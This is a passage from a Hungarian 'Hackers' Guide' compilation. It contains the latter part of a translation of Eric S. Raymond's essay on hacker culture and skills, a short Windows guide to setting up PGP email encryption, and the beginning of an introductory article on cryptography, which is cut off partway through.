A hacker természeténél fogva hatalomellenes. Bárki, aki parancsokat osztogat neki,<br />

akadályozza az éppen soron lévő érdekes probléma megoldásában -- és mivel<br />

tudjuk, hogyan működik a parancsokat osztogatók agya, ez előbb utóbb<br />

elkerülhetetlen lesz, kitalálnak valami ostoba okot. Tehát a parancsolgató magatartás<br />

ellen küzdeni kell, bárhol ahol találkozol vele, nehogy megfojtson Téged, vagy hacker<br />

társaidat.<br />

(Ez nem jeleni azt, hogy mindennemű hatalmat bírálni kell. A gyerekeknek<br />

szükségük van irányításra, és a bűnözőknek felelniük kell tetteikért. A hacker dönthet<br />

úgy, hogy elfogad bizonyos szintű irányítást, ha valami olyasmit kap ez által, ami<br />

fontosabb Neki, mint az utasítások követésére elpazarolt idő. De ez csakis<br />

korlátozott lehet, szó nincsen arról a személyes behódolásról, amit a parancsolgató<br />

beállítottságú emberek elvárnak.)<br />

A parancsolgató ember lételeme a cenzúra és a titkolózás. Bizalmatlan mindennel<br />

szemben, ami önkéntes együttműködés és információmegosztás -- csak az olyan<br />

`együttműködést' szereti, amit ő irányít. Tehát ha hackerként akarsz viselkedni, ki kell<br />

fejlesszél egy ösztönös ellenszenvet a cenzúra, a titkolózás és a felelős felnőtt<br />

emberek erőszakos kényszerítése iránt. Nem csak hinned kell, hogy ez a helyes,<br />

hanem e szerint kell cselekedned.<br />

5. A magatartás nem helyettesíti a kompetenciát<br />

Ahhoz, hogy hacker lehess, ki kell fejlesztened az előbb felsorolt tulajdonságok közül<br />

néhányat. De kizárólag a viselkedés másolásával nem lehetsz hacker, ugyanúgy,<br />

ahogy világbajnok atléta sem, vagy rocksztár. A hackerré váláshoz intelligencia kell,<br />

gyakorlat, elhivatottság és kemény munka.<br />

Ezért meg kell tanulnod, hogy nem szabad bízni a viselkedésben, és tisztelni kell<br />

bármilyen szaktudást. A hacker nem pazarolja az idejét szimulánsokra, de értékeli a<br />

szakértelmet -- főleg a hackeléssel kapcsolatos szakértelmet, de bármilyen más<br />

irányú szaktudás is elismerendő. Ha a szaktudásod olyan területet is lefed, amihez<br />

kevesen értenek, az jó, ha olyan terület szakértője vagy, ami precíz logikai<br />

képességeket, szellemi erőt és koncentrációs képességet igényel, az a legjobb.<br />

Ha tiszteled a hozzáértést, örömöd telik majd a képességeid fejlesztésében -- a<br />

kemény munka és az, hogy ennek szenteled magad, egy komoly játék lesz, és nem<br />

robotolás. Ez életbevágóan fontos, ha hacker akarsz lenni.<br />

Alapvető képességek hackeléshez<br />

58


Hackers’ Guide<br />

A hacker hozzáállás létfontosságú, de a képességek még fontosabbak. A viselkedés<br />

nem helyettesíti a kompetenciát, van egy alapvető képességtár, amivel rendelkezned<br />

kell, mielőtt a hackerek társuknak tartanak.<br />

Ezek a képességek lassan változnak az idők során, ahogy a technológia fejlődik, új<br />

területek jönnek létre, melyek új képességeket igényelnek, a régiek ezzel<br />

párhuzamosan elavulnak. Például, az alapképességek közé tartozott régebben a<br />

gépi kódban való programozás, míg a HTML ismerete csak az utóbbi időben vált<br />

szükségessé. Jelenleg a következők tartoznak a hacker alapműveltségéhez:<br />

1. Tanulj meg programozni<br />

Ez, természetesen, az alapvető tudás, minden hacker számára. Ha nem ismersz<br />

egyetlen programozási nyelvet sem, javaslom, hogy kezdjél a Pythonnal. Jól<br />

tervezett, jól dokumentált és relatíve kíméletes a kezdőkkel. Annak ellenére, hogy jó<br />

kezdő nyelv, nem csak játékszer; a python egy nagyon sokoldalú és rugalmas nyelv,<br />

amely alkalmas nagy projektek létrehozására.<br />

Legyél tisztában azzal, hogy nem fogod elérni a hacker szaktudását, vagy akárcsak<br />

egy egyszerű programozóét sem, ha csak egy nyelvet ismersz -- meg kell tanulnod<br />

nyelvtől függetlenül gondolni a programozási problémákra. Ahhoz, hogy igaz hacker<br />

lehess, el kell jussál arra a pontra, amikor egy új programozási nyelvet néhány nap<br />

alatt meg tudsz tanulni, a leírások alapján, abból kiindulva, amit már tudsz. Ez azt<br />

jelenti, hogy több, egymástól nagyon különböző nyelvet kell megtanuljál.<br />

Ha komoly programozásba kezdesz, meg kell tanulnod a C nyelvet, a Unix<br />

alapnyelvét (a C-t ettől függetlenül nem ajánlom első nyelvnek). Az egyéb fontos<br />

nyelvek közé tartozik a Perl és a LISP. A Perlt gyakorlati okok miatt érdemes<br />

megtanulni; gyakran használják dinamikus web oldalak létrehozásához és rendszeradminisztrációhoz,<br />

tehát ha nem is írsz soha Perlt, mindenképp érdemes<br />

megtanulnod olvasni azt. A LISP-et a megvilágosodás mély érzése miatt érdemes<br />

megtanulni, amit akkor érzel, amikor végre sikerül megérteni, hogy miről is van szó;<br />

ez a tapasztalat jobb programozóvá tesz a hátralévő napjaidra, még akkor is, ha nem<br />

használod majd gyakran a LISP-et.<br />

A legjobb, igazából, ha ezt a négy nyelvet (Python, C, Perl, és LISP) mind<br />

megtanulod. Amellet, hogy ezek a hacker alapnyelvei, nagyon eltérő módon közelítik<br />

meg a programozást, mindegyikből hasznos és értékes új ismeretekre tehetsz szert.<br />

Nem tudok kimerítő leírást adni arról, hogy hogyan tudsz megtanulni programozni --<br />

nagyon összetett tudásról van szó. Egyet azonban elárulhatok: a könyvek és<br />

tanfolyamok nem érnek túl sokat (sok, valószínűleg a legtöbb hacker autodidakta).<br />

Aminek van értelme: (a) kódot olvasni és kódot írni.<br />

Programozni megtanulni ugyanolyan, mint a saját anyanyelveden megtanulni írni. A<br />

legjobb módszer, ha beleolvasol abba, amit a mesterek írtak, majd írsz valamit,<br />

utána olvasol még egy jó adag kódot, írsz egy keveset, olvasol még egy adagot, írsz<br />

még egy kicsit... és mindezt addig ismétled, amíg a saját kódodban el nem kezded<br />

felfedezni a példaképek kódjainak jó vonásait.<br />

Régen nehézkes volt jó, olvasásra érdemes kódot találni, mert kevés nagy program<br />

forráskódja állt a zöldfülű hackerfiókák rendelkezésére. Ez drasztikusan<br />

megváltozott; ma már nyílt forráskódú szoftverek, programozási eszközök és<br />

59


Hackers’ Guide<br />

operációs rendszerek (ezeket is mind hackerek írták) könnyedén elérhetők bárki<br />

számára. Ez át is vezet minket a következő témához...<br />

2. Szerezz be egy nyílt forráskódú Unixot és tanuld meg használni<br />

Abból indulok ki, hogy van egy PC-d, vagy hozzáférsz valahol egyhez (ezeknek a<br />

mai gyerekeknek olyan könnyű dolguk van :-)). Az legfontosabb lépés a hackerré<br />

válás útján: szerezz be valamilyen Linuxot vagy BSD-Unixot, telepítsd fel a gépedre,<br />

és tanuld meg használni.<br />

Igen, vannak a Unixon kívül más operációs rendszerek a világon. De azokat<br />

binárisokban terjesztik, ergo nem tudod olvasni vagy módosítani a kódot. Hackelni<br />

tanulni DOS, Windows vagy MacOS alatt olyan, mintha kényszerzubbonyban<br />

próbálnál táncolni tanulni.<br />

Mindezek mellett, nem szabad megfeledkezni arról, hogy a Unix az Internet<br />

operációs rendszere. Megtanulhatod ugyan az Internet használatát Unix ismeretek<br />

nélkül, de biztosan nem lehetsz Internetes hacker. Éppen ezért, manapság a hacker<br />

kultúra elég határozottan Unix-központú. (Ez nem volt mindig így, néhány régi<br />

motoros a mai napig nem tud ezzel megbékélni, de a Unix és az Internet közötti<br />

szimbiózis annyira megerősödött, hogy még a Microsoft sem tud igazán csorbát<br />

ejteni rajta.)<br />

Tehát húzzál fel egy Unixot -- én személy szerint a Linuxot szeretem, de van<br />

választék (és igen, lehet ugyanazon a gépen felváltva Linuxot és DOS / Windows-t<br />

használni). Tanuld meg használni. Játsszál vele. Lődd össze az Internetet vele.<br />

Olvasd a forrásokat. Módosítsd a forrásokat. Olyan programozási eszközökkel fogsz<br />

találkozni Linux alatt (pl. C, LISP, Python és Perl), amilyenekről egy Microsoft<br />

operációs rendszer alatt álmodni sem mernél, jól szórakozol, és olyan sok tudást<br />

szívsz magadba, hogy bele sem gondolsz, egészen addig, amíg már profi<br />

hackerként vissza nem emlékszel ezekre az időkre.<br />

Ha többet akarsz tudni a Unix-ról, vess egy pillantást a Loginatakára.<br />

Információt találsz arról, hogy hogyan és honnan szerezzél be Linuxot a Honnan<br />

szedjek Linuxot? című oldalról.<br />

Találhatsz BSD Unix-al kapcsolatos segítséget és linkeket a http://www.bsd.org/<br />

címen.<br />

(Megjegyzés: Nem ajánlom, hogy Linux vagy BSD telepítésbe kezdjél egyedül, ha<br />

teljesen kezdő vagy a témában. Ha Linuxal próbálkozol, keress meg egy helyi<br />

felhasználó csoportot [ilyen Magyarországon az LME] és kérj segítséget, vagy vedd<br />

fel a kapcsolatot a Linux Internet Support Co-Operative-al. A LISC üzemeltet IRC<br />

csatornákat is, ahol [angol nyelvű] segítséget kaphatsz.)<br />

3. Tanuld meg használni a Világhálót (World Wide Web) és a tanulj meg HTML-t<br />

írni<br />

A hackerek által létrehozott dolgok többsége észrevétlenül a háttérben működik,<br />

segíti a gyárakban, irodákban és egyetemeken folyó munkát, látszólag nem<br />

befolyásolva a nem-hackerek életét. A Web az egyetlen nagy kivétel, a hatalmas<br />

csillogó-villogó hacker játékszer, amiről még a politikusok is elismerik, hogy<br />

60


Hackers’ Guide<br />

megváltoztatja a világot. Ezért (valamint egy csomó más nyomós ok miatt) meg kell<br />

tanulnod a Webbel dolgozni.<br />

Ez nem csak azt jelenti, hogy meg kell tanulnod Web-böngészőt használni (ezt bárki<br />

megteheti), hanem azt is, hogy el kell sajátítanod a HTML-t, a web nyelvét. Ha nem<br />

tudsz programozni, a HTML tanulása közben felvehetsz bizonyos jó szokásokat,<br />

amiknek hasznát veszed a későbbi tanulmányaid során. Tehát hozzál létre egy<br />

honlapot.<br />

Az, hogy van egy honlapod, még közelítőleg sem jelenti azt, hogy hacker vagy. A<br />

Web tele van honlapokkal. A legtöbbjük értelmetlen, nulltartalmú hulladék -- tarka<br />

hulladék, mondhatnád, de attól még ugyanúgy szemét. (erről többet olvashatsz a A<br />

HTML Pokol oldalán).<br />

Hogy olvasásra érdemes legyen egy lap, kell legyen tartalma -- érdekes és vagy<br />

hasznos kell legyen más hackerek számára. Ez átvezet a következő témához...<br />

Státus a Hacker kultúrában, közösségben<br />

Mint a legtöbb pénz és gazdaság nélküli kultúra, a hackerség meghatározó eleme a<br />

hírnév. Érdekes problémákat próbálsz megoldani, de azt, hogy ezek a problémák<br />

valójában mennyire érdekesek és hogy igazából a mennyire jó a megoldásod, csak<br />

azok tudják megítélni, akik szintén szakértők a kérdéses területen.<br />

Ehhez hasonlóan, amikor a hackerek szabályai szerint játszol, megtanulod, hogy az<br />

alapján kapod a jó pontokat, hogy mások mire tartják a szakértelmedet (ezért írtam<br />

korábban, hogy addig nem vagy igazi hacker, amíg nem a többiek hívnak annak). Ezt<br />

a tényt elhomályosítja az a kép, ami a hackelést magányos munkának tünteti fel,<br />

valamint az a hacker körökben elterjedt nézet, miszerint a büszkeség vagy az, hogy<br />

mások mit gondolnak, nem lehet a motiváló tényezők része.<br />

Egészen pontosan, a hackerség az, amit az antropológusok ajándék kultúrának<br />

neveznek. Nem az által szerzel egy ilyen társadalomban hírnevet, hogy elnyomsz<br />

másokat, azzal sem, hogy szép vagy, vagy olyan dolgokat birtokolsz, amikért mások<br />

áhítoznak, hanem azzal, hogy adsz. Másokra áldozod történetesen az idődet, a<br />

kreativitásodat és a szaktudásod gyümölcseit.<br />

Alapvetően öt dolgot tehetsz, hogy kivívd a hackerek elismerését:<br />

1. Írj nyílt forráskódú szoftvert<br />

Az első (legfontosabb és legelfogadottabb) módja a bevágódásnak, ha olyan<br />

programot írsz, amiről a hackerek úgy látják, hogy hasznos vagy jópofa, és<br />

elérhetővé teszed a forrását, hogy az egész közösség felhasználhassa azt.<br />

(Ezeket a munkákat ``free software''-nek hívtuk, de mivel nem volt mindenki számára<br />

egyértelmű, hogy a ``free'' a szabadra vagy az ingyenesre utal-e, sokunk inkább az<br />

``open-source'' azaz nyílt forráskódú szoftver kifejezést részesíti előnyben.)<br />

A hacker kultúra legelismertebb félistenei olyan emberek, akik nagy, hasznos<br />

programokat írtak, amikre széles körben volt szükség, majd a közösség<br />

rendelkezésére bocsátották ezeket, hogy mindenki szabadon felhasználhassa őket.<br />

2. Segíts nyílt forráskódú szoftvert tesztelni és debuggolni<br />

61


Hackers’ Guide<br />

Azok munkája is nagyon hasznos, akik tesztelik és javítják a nyílt forráskódú<br />

szoftvereket. Ebben a tökéletlen világban elkerülhetetlen, hogy a szoftverfejlesztésre<br />

szánt idő tetemes részét hibakereséssel és javítással töltsük. Ezért minden józan<br />

eszű, nyílt forráskódot karbantartó szerző egyet fog velem érteni, amikor azt írom,<br />

hogy a jó béta-tesztelő (aki világosan le tudja írni a tüneteket, jól tudja lokalizálni a<br />

problémát, el bírja viselni a hibákat az összecsapott kiadásokban, hajlandó néhány<br />

egyszerű diagnosztizáló eszközt alkalmazni) megéri a súlyát gyémántban. Egy szem<br />

ilyen béta-tesztelő eldöntheti, hogy a hibakeresés egy kétségbeejtő, kimerítő<br />

rémálom vagy csak egy hasznos kellemetlenség.<br />

Ha újonc vagy, keress egy fejlesztés alatt álló programot, ami érdekel és próbálj jó<br />

béta-tesztelő lenni. Innen már magától megy minden, a tesztelés után besegíthetsz a<br />

hibakeresésbe, utána besegíthetsz a fejlesztésbe. Sokat tanulhatsz így, és jó pontot<br />

szerezhetsz olyan embereknél, akik segíthetnek majd a későbbiek során.<br />

3. Tegyél közzé hasznos információkat<br />

Még egy jó dolog, amit megtehetsz, a hasznos és érdekes információ kiszűrése majd<br />

Web lapon, vagy GyIK (Gyakran Ismételt Kérdések listája) dokumentumokban való<br />

közzététele.<br />

A főbb szakmai GyIK-ek karbantartói majdnem olyan elismerésben részesülnek, mint<br />

a nyílt forráskódú szoftvert író programozók.<br />

4. Segíts működésben tartani az infrastruktúrát<br />

A hacker kultúrát (és így egyben az Internet fejlesztését is) önkéntesek tartják<br />

karban, működésben. Sok szükséges ám kevésbé látványos és vonzó munkát kell<br />

elvégezni, hogy a gépezet működjön -- levelezési listákat kell adminisztrálni,<br />

hírcsoportokat moderálni, hatalmas szoftver archívumokat fenntartani, RFC-ket és<br />

más technikai szabványokat írni.<br />

Azok az emberek, aki ezeket a feladatokat jól látják el, nagy tiszteletben állnak, mert<br />

mindenki tudja, hogy a munkájuk borzalmasan időt rabló, és nem olyan mókás, mint<br />

a kódolás. Akik ezt a fajta munkát csinálják, elhivatottak.<br />

5. Szolgáld a hacker társadalmat<br />

Végül, szolgálhatod és népszerűsítheted magát a hacker kultúrát (például azzal,<br />

hogy írsz egy részletes bevezetőt arról, hogy hogyan lesz az emberből hacker :-)).<br />

Ez nem olyasmi, amit meg tudsz csinálni, amíg nem vagy a hacker társadalom<br />

résztvevője egy bizonyos időn keresztül és nem válsz ismerté az előző négy pont<br />

valamelyike által.<br />

A hacker társadalomnak nincsenek kimondott vezetői, de vannak hősei, ``vénjei'',<br />

történészei és szóvivői. Ha már elég régóta vagy a csatasorban, ezek egyikévé<br />

nőheted ki magad. De ne feledd: a hackerek bizalmatlanok a túl nagy mellénnyel<br />

rendelkező ``vénekkel'' szemben, tehát veszélyes ezt a stádiumot látványosan elérni.<br />

Ne törekedjél erre, inkább helyezkedj úgy, hogy az öledbe hulljon, majd legyél<br />

szerény, és ápold gondosan a kapcsolataidat.<br />

A Hacker / Kocka összefüggés<br />

A népszerű híreszteléssel ellentétben, ahhoz, hogy hacker legyél, nem kell, hogy<br />

"kocka" légy. Ettől függetlenül segítségedre lehet -- a valóságban sok hacker<br />

62


Hackers’ Guide<br />

"kocka". Ha társadalmilag kirekesztett vagy, az segít abban, hogy az igazán fontos<br />

dolgokra koncentrálj, mint pl. az elmélkedés és a hackelés.<br />

Ezért sok hacker felvállalja a ``kocka'' bélyeget, sőt, büszkén használják a durvább<br />

``geek'' kifejezést is -- így függetlenítik magukat a konvencionális társadalmi<br />

elvárásoktól. A Geek oldalon olvashatsz bővebben a témáról.<br />

Ha meg tudod oldani, hogy elég figyelmet fordítasz a hackelésre ahhoz, hogy jó<br />

hacker legyél, és emellett normális életet is tudsz folytatni, akkor jó. Ez manapság<br />

sokkal könnyebb feladat egy újonc számára, mint az én időmben volt, a 70-es<br />

években; napjainkban a társadalom sokkal toleránsabb a techno-megszállottakkal<br />

szemben. Sőt, egyre több ember jön rá, hogy a hackerek gyakran kiváló minőségű<br />

szerető és férj alapanyagok.<br />

Ha azért vonz a hackelés, mert nincs életed, az is OK -- legalább nem vonja el<br />

semmi a figyelmedet. Lehet, hogy később még az is kialakul.<br />

Pontok a stílusért<br />

Még egyszer, ahhoz, hogy hacker legyél, úgy kell gondolkodj, mint egy hacker.<br />

Vannak dolgok, amiket ez érdekében megtehetsz, ha éppen nem számítógép előtt<br />

ülsz. Ezek nem helyettesítik a hackelést (azt semmi sem helyettesítheti), de sok<br />

hacker foglalkozik ilyen dolgokkal, így ezek is kapcsolódnak a hackelés lényegéhez.<br />

• Olvass tudományos-fantasztikus irodalmat. Járjál tudományos-fantasztikus<br />

témájú klubokba, gyűlésekre. (Ott találkozhatsz hackerekkel és protohackerekkel).<br />

• Tanulmányozd a Zen-t, és/vagy tanulj harci művészeteket. (A meditálás is<br />

hasonló sok szempontból.)<br />

• Tanuld meg a zenét elemző füllel hallgatni. Tanuld meg értékelni az egyéni<br />

zenei stílusokat. Tanulj meg valamilyen hangszeren játszani vagy énekelni.<br />

• Barátkozz meg a szójátékokkal.<br />

• Tanulj meg jól és helyesen írni az anyanyelveden. (Meglepően sok hacker,<br />

többek között a legjobbak, akiket ismerek, jó írók.)<br />

Ezek közül minél több dolog tűnik természetesnek Neked, annál jobb hackeralapanyag<br />

vagy. Hogy miért pont ezek a dolgok, az nem teljesen világos, de<br />

valószínűleg összefüggés van közöttük és az agy jobb és bal féltekéjében honos<br />

képességek sora között, amelyek a hacker számára elengedhetetlenek (a hacker<br />

képes kell legyen logikusan gondolkodni, de ki is kell tudjon lépni az adott probléma<br />

látszólagos logikájából).<br />

Végül néhány kerülendő dolog:<br />

• Ne használj ostoba, nagyzoló felhasználói azonosítót vagy becenevet.<br />

• Ne keveredj felesleges vitákba (flame háborúkba) a Usenet-en (máshol sem).<br />

• Ne hívd magad `cyberpunk'-nak és vesztegesd az idődet olyanra, aki annak<br />

titulálja magát.<br />

• Ne küldjél e-mail-eket tele helyesírási és nyelvtani hibákkal.<br />

63


Hackers’ Guide<br />

Ha ilyeneket csinálsz, legfeljebb rossz híred kel -- csak azt jegyzik meg rólad,<br />

mekkora balfácán vagy. A hackereknek jó a memóriájuk -- évekbe telhet amíg<br />

elfelejtik a kezdő botladozásaidat, és befogadnak.<br />

A becenevek problémájára külön visszatérnék. Az igazi személyed becenevek mögé<br />

rejtése gyerekes és ostoba dolog, és a crackerekre, warez d00dz-okra és más<br />

alsóbbrendű életformákra jellemző viselkedés. A hacker nem csinál ilyet; büszke arra<br />

amit csinál és amit elért, ezért szereti, ha az igazi nevét is ismerik. Tehát ha ilyen<br />

becenevet használsz, hagyd el, mert a hackerek között csak vesztesnek bélyegez.<br />

Egyéb források<br />

Peter Seebach karbantart egy kiváló Hacker GyIK-et menedzserek, főnökök<br />

számára, akik nem tudják hogyan álljanak a hacker beosztottakhoz. Ha Peter lapja<br />

nem lenne elérhető, próbáld az Excite-on keresztül megtalálni a lap egy másolatát.<br />

A Loginatakának van némi mondanivalója a Unix hacker képzettségét és<br />

hozzáállását illetően.<br />

Írtam egy esszét A hackerség rövid története címmel.<br />

Írtam egy esszét, A Katedrális és a Bazár címmel, ami részletesem elemzi a Linux és<br />

az open-source köré épülő társadalmak működését. Még közvetlenebbül tárgyaltam<br />

ezt a témát a folytatásban a Homesteading the Noosphere-ben.<br />

Gyakran Ismételt Kérdések<br />

K: Megtanítasz hackelni?<br />

V: Amióta először megjelentettem ezt a lapot, hetente (gyakran naponta) többen<br />

kérik, hogy "tanítsak meg mindent a hackelésről". Sajnos, erre sem időm, sem<br />

energiám nincs; a saját hackeléssel kapcsolatos projektjeim kiteszik az időm 110%át.<br />

Még ha lenne is lehetőségem arra, hogy a hackelést tanítsam, nem tehetném, mert<br />

ez egy olyan hozzáállás és képesség, amit magadnak kell egyedül elsajátítanod.<br />

Meg fogod látni, hogy az igazi hackerek örömmel segítenek neked, de nem fognak<br />

tisztelni és elismerni, ha mindent a szádba kell rágjanak.<br />

Tanulj meg először néhány dolgot. Mutasd meg, hogy próbálkozol, hogy tudsz<br />

önállóan tanulni. Ezek után a hackereket már csak specifikus kérdésekkel zargasd.<br />

K: Akkor hol kezdjem?<br />

V: Valószínűleg a legjobb módja a hackeléssel való ismerkedésnek az, ha elmész<br />

egy Linux Felhasználói Csoport gyűlésére. Megtalálhatod ezeknek a csoportoknak a<br />

listáját az LDP General Linux Information Page weblapon; valószínűleg van egy a<br />

közeledben, esetleg egy főiskolán vagy egyetemen. A Linux Felhasználói Csoport<br />

tagjaitól egyszerűen szerezhetsz Linuxot és egészen biztosan segítenek majd a<br />

telepítésnél is.<br />

K: Mikor kell kezdenem? Nem vagyok én már ehhez túl öreg?<br />

V: Legyél bármilyen idős, a motiváció a fontos. Általában a 15 és 20 év közötti<br />

korosztály érdeklődését kelti fel a hackelés, de ismerek kivételeket mind a két<br />

irányban.<br />

K: Mennyi ideig tart, amíg megtanulok hackelni?<br />

64


Hackers’ Guide<br />

V: Ez attól függ, hogy mennyire vagy tehetséges és mennyire dolgozol keményen.<br />

Általában 18 hónap vagy 2 év alatt már tiszteletreméltó képességekre tehetsz szert,<br />

ha ügyes vagy. Ennek ellenére ne gondold, hogy ennyi az egész; ha igazi hackerré<br />

válsz, sohasem hagyod abba a tanulást, életed hátralevő részét a képességeid<br />

tökéletesítésével töltöd majd.<br />

K: Segítenél feltörni egy rendszert, vagy megtanítanál betörni?<br />

V: Nem. Az aki ennek a GyIK-nek az elolvasása után ilyen kérdést tesz fel, túl ostoba<br />

ahhoz, hogy bármit tanítsak neki, még ha időm lenne is. Bármilyen ilyen témában<br />

küldött e-mail a szemetes kosárban köt ki, vagy rosszabb esetben a feladó durva<br />

válaszra számíthat.<br />

K: Betörtek hozzám. Segítesz elkerülni a jövőbeni támadásokat?<br />

V: Nem. Ezt a kérdést mindig olyanok teszik fel, akik Windows-t használnak. A<br />

Windows-os rendszereket nem lehet hatékonyan biztonságossá, a betörésekkel<br />

szemben ellenállóvá tenni; a kódban és a szoftver architektúrájában túl sok lyuk van,<br />

körülbelül olyan vállalkozás ez, mintha pohárral akarnánk egy süllyedő hajóból a<br />

vizet kimerni. Az egyetlen megbízható megoldás, ha átváltasz Linuxra vagy<br />

valamilyen másik igazi biztonságos operációs rendszerre.<br />

K: Hol találkozhatok, beszélhetek igazi hackerekkel?<br />

V: A legjobb megoldás, ha keresel egy Linux vagy Unix Felhasználói csoportot és<br />

elmész a gyűléseikre (találsz linkeket az LDP weblapján a Metalabnál).<br />

(Régebben azt írtam volna itt, hogy IRC-n nem találkozhatsz igazi hackerrel, de úgy<br />

tűnik ez változik. Mostanában igazi hacker csoportoknak, mint pl. a GIMP és a Perl<br />

körül serénykedőknek, saját IRC csatornájuk van.)<br />

K: Tudsz ajánlani hasznos könyveket a hackeléssel kapcsolatban?<br />

V: Én tartom karban a Linuxos Irodalomlista HOGYANt , ez segítségedre lehet. A<br />

Loginataka szintén érdekes lehet.<br />

K: Mit kell először megtanuljak?<br />

V: A HTML-t, ha még nem ismernéd. Sok csillogó-villogó, lényegtelen dolgokra<br />

fókuszáló rossz HTML-ről szóló könyv van forgalomban, és kétségbeejtően kevés jó.<br />

Személyes kedvencem az HTML: The Definitive Guide című O'Reilly kiadvány.<br />

A HTML azonban nem programozási nyelv. Ha felkészültél arra, hogy elkezdjél<br />

programozni tanulni, véleményem szerint a Pythont válaszd. Sokan a Perlt ajánlják,<br />

ami igaz, hogy elterjedtebb, mint a Python, de nehezebb megtanulni és (véleményem<br />

szerint) nincs olyan jól megtervezve. Találhatsz linkgyűjteményt a kezdő Python<br />

programozó számára a Weben.<br />

A C igazán fontos, de ugyanakkor sokkal nehezebb, mint a Python vagy a Perl. Ne<br />

próbáld elsőként megtanulni.<br />

Windows felhasználók, ne ragadjatok le a Visual Basic-nél! Rossz programozási<br />

szokásokat fogtok felvenni tőle, és nem hordozható, teljesen a Windows platformra<br />

van utalva. Kerülendő.<br />

K: Muszáj utálnom a Microsoftot?<br />

V: Nem, nem muszáj. Nem azért, mert nem érdemli meg, de léteztek hacker<br />

közösségek a Microsoft előtt, és lesznek még akkor is, amikor a Microsoft már régen<br />

65


Hackers’ Guide<br />

történelem lesz. A Microsoft utálata helyett szeresd inkább a saját erődet. Írjál jó<br />

kódot, ezzel többet érsz el, mint a Microsoft mocskolásával, és még a hírnevedet<br />

sem sodrod veszélybe.<br />

K: De nem veszélyezteti az open-source szoftverfejlesztés a programozók<br />

megélhetését?<br />

V: Ez valószínűtlen -- sőt, a nyílt forráskódú szoftveripar inkább új állásokat hoz létre.<br />

Ha az, hogy egy program meg van írva, nettó nyereséggel jár, a programozót meg<br />

fogják fizetni, függetlenül attól, hogy a program nyílt lesz-e, miután elkészül. Az is<br />

mindegy, hogy mennyi "nyílt" szoftvert írnak a programozók, úgy tűnik, hogy növekvő<br />

kereslet van az új és testre szabott alkalmazások iránt. Többet írtam erről a témáról<br />

az Open Source lapokon.<br />

K: Hogyan fogjak neki? Honnan szerezzek szabad Unixot?<br />

V: Feljebb ezen az oldalon találsz mutatókat a legelterjedtebb szabad Unixokra.<br />

Ahhoz, hogy hacker legyen belőled, motivációra, vállalkozó szellemre és az önálló<br />

tanulás képességére van szükséged. Vágj bele most...<br />

Eric S. Raymond mailto:esr@thyrsus.com<br />

Fordította:<br />

Kovács Emese mailto:emese@goliat.eik.bme.hu<br />

************************************************************************************************<br />

Használjatok PGP-t<br />

Ebben a cikkben leírom, hogy Windows98/NT/2000 alatt hogyan tudjátok<br />

használatba venni a PGP-t és egyszeruen biztonságossá tenni a levelezéseteket! A<br />

titkosítás cikkben már írtam arról, hogy mi a digitális aláírás értelme, most erre nem<br />

térek ki, csak azt írom itt le, hogy honnan lehet a szükséges cuccokat letölteni, és mit<br />

kell csinálni!<br />

A PGP legújabb változatát a http://web.mit.edu/network/pgp.html címrol lehet<br />

leszedni. Válasszuk ki a megfelelo verziót (PGP Freeware v6.5.3) és Download. Itt<br />

feltesz négy kérdést, amelyekre mindre Yes-el kell válaszolni, aztán már bent is<br />

vagyunk a letöltés oldalon. Ez az oldal csak 10 percig él, utána már nem tudunk<br />

letölteni, hanem vissza kell menni (nem tudom ez a hülyeség miért kell, de hát ez<br />

van). A PGPFreeware 6.5.3 mérete olyan 7.5 mega körül van.<br />

Ezt installáljuk fel. Ezután a Start menübe kapunk egy PGP nevu menüpontot, és<br />

ebben van egy olyan ikon, hogy PGPtray. Ezt elindítva betelepedik lentre, az óra<br />

66


mellé, és használatba vehetjük a PGP-t. (Érdemes a PGPtray-t induláskor<br />

automatikusan elindíttatni vele.)<br />

Hackers’ Guide<br />

Indítsuk el a PGPKeys -t, ezzel fogunk egy új kulcspárt generálni magunknak, amivel<br />

utána titkosíthatjuk a cuccokat. Van ott egy olyan gomb, hogy Generate keys. Az<br />

értelemszeru kérdéseken túl válasszuk a Diffie-Hellman/DSS típusú kulcsot, aztán<br />

válasszuk ki a kulcsméretet (megfelelo a default 2048/1024 is). Legyen keypair never<br />

expires, aztán írjuk be a választott jelkifejezést (jelszót, ami lehetoleg jó bonyolult<br />

legyen) kétszer. Ezután legenerálja a kulcsot a pgp, hagyjuk üresen a Send my key<br />

to the root server now ikszelonégyzetet és Finish. A PGPKeys ablakban ezután<br />

megjelenik a kulcsod. Kattints rá jobb gombbal és Set as default.<br />

Ezek után, ha elindítod az Outlook Expresst, és írsz egy új levelet valakinek, akkor a<br />

fölso gomboknál megjelenik három új gomb. Az elso az Encrypt, ezzel tudjuk<br />

titkosítani a címzettnek a levelet (ha a címzett kulcsa megvan a keyringen). A<br />

másodikkal tudjuk digitálisan aláírni a levelünket. (Be kell nyomni a gombot, és az<br />

aláírás a levél elküldésénél történik meg.) A harmadik elindítja a PGPKeys-t.<br />

Nagyjából ennyi. Ha valakinek van kérdése, írjon mailt.<br />

************************************************************************************************<br />

A titkosításról<br />

Fordítás, eredeti cím/szerzo: "PGP Encryption for Beginners."/the saint/<br />

De eloször, kezdjük ezzel: mi a fenének akarnád titkosítani az adataidat?<br />

Szóval!! képzeld el, hogy valaki betör a számítógépedbe. Ahelyett, hogy ellophatná<br />

az összes hitelkártyaszámodat és jelszavadat, és elolvasná az emailjeidet, helyette<br />

csak titkosított hulladékot fog kapni, ami semmit nem jelent neki, és igencsak nehéz<br />

lesz visszakódolni.<br />

Ha nem egyedül használod a számítógépet. Kockáztatnád, hogy valaki hozzáférjen a<br />

privát adataidhoz? Remélem, érted, mirol van szó.<br />

A PGP (Pretty Good Privacy) - egy rendszer, amely kombinálja a hagyományos és a<br />

nyilvános kulcsú titkosítások elonyeit. (Ezekrol késobb lesz szó majd.) Néha hibrid<br />

titkosításnak is nevezik (hybrid cryptosystem).<br />

Bevezetés a kriptográfiába<br />

Legeloször is megismertetnék veled néhány szót, amelyet gyakran fogok használni<br />

ebben a cikkben:<br />

67


Hackers’ Guide<br />

1. Nyílt szöveg (plain text) - adat, amely könnyen olvasható és megértheto, speciális<br />

muveletek nélkül. (Például ez a cikk nyílt szöveg, amit most olvasol.)<br />

2. Rejtjelzés (encryption) - A nyílt szöveg megváltoztatásának útja, amely során<br />

megváltozik az alakja, de az adatok nem vesznek el, és a célja az, hogy "elrejtse" az<br />

adatot a "gonoszok" elol.<br />

3. Rejtjelezett szöveg (ciphertext) - a rejtjelzés végeredménye - elso ránézésre egy<br />

szeméthalom.<br />

4. Visszafejtés (decryption) - módszer a rejtjelezett szöveg nyílt szöveggé<br />

